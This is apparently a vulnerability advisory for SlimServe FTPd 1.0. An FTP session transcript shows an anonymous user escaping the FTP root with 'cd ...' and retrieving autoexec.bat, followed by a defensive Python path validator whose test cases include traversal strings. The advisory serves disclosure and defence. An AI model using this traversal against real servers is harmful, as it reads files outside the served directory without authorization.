COMMAND

    SlimServe FTPd

SYSTEMS AFFECTED

    SlimServe FTPd 1.0

PROBLEM

    Joe Testa found the following.  A vulnerability exists which allows
    an attacker to break out of the ftp root using relative paths
    (i.e. '...').

    The following is an illustration of the problem.  An ftp root of
    "c:\directory\directory" was used.

        % ftp localhost
        Connected to xxxxxxxxxx.rh.rit.edu.
        220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
        220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu.
        User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous
        230 User anonymous logged in, proceed.
        ftp> cd ...
        250 CWD command successful.
        ftp> get autoexec.bat
        200 PORT command successful.
        150 Opening data connection for "/.../autoexec.bat".
        250 RETR command successful.
        ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
        ftp>

SOLUTION

    No quick fix is possible.  Vendor has been informed.
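
    For server developers, one way to refuse the request shown in the
    transcript, as an added example (not SlimServe's code and not from
    the advisory's author). The names resolve_virtual and PathRejected
    and the sample paths are assumptions; the check goes beyond '...'
    to cover '..' above the root, backslashes, drive colons and names
    ending in a dot or space.

```python
class PathRejected(ValueError):
    """Raised when a client-supplied FTP path must not be served."""


def resolve_virtual(cwd, arg):
    """Resolve `arg` against `cwd` inside the virtual FTP tree.

    Both are '/'-separated; '/' is the FTP root. Returns the normalized
    virtual path, or raises PathRejected. The caller maps the result onto
    the real root directory only after this function has accepted it.
    """
    # Backslash is a separator and ':' a drive/stream marker on Windows,
    # so neither may reach the filesystem API from client input.
    if any(c in arg for c in "\\:\0"):
        raise PathRejected("backslash, colon or NUL in path")

    # Absolute arguments start from the root, relative ones from cwd.
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]

    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathRejected("'..' above the FTP root")
            parts.pop()
        elif comp.endswith((".", " ")):
            # Catches '...', '....' and '.. ' (assumed here to be walked
            # upward by the platform, as the transcript suggests), plus
            # names whose trailing dots/spaces Win32 strips silently.
            raise PathRejected("component ends in dot or space: %r" % comp)
        else:
            parts.append(comp)
    return "/" + "/".join(parts)


if __name__ == "__main__":
    # Constructed requests: (current directory, client argument).
    for cwd, arg in [("/", "..."), ("/", "autoexec.bat"),
                     ("/pub", "../.../autoexec.bat"), ("/pub", "docs/a.txt")]:
        try:
            print("%-22r -> %s" % (arg, resolve_virtual(cwd, arg)))
        except PathRejected as exc:
            print("%-22r -> rejected (%s)" % (arg, exc))
```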